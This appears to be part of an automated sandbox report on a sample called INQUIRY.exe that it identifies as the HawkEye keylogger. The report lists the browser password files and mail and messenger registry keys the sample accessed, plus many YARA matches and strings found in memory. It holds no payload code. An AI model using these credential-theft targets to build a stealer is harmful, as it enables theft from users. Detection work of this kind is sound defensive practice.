                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Instant Messenger accounts or passwordsShow sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)Show sources
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword5_2_004033D7
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword5_2_004033D7
                    Yara detected WebBrowserPassView password recovery toolShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6700, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4184, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    barindex
                    Detected HawkEye RatShow sources
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
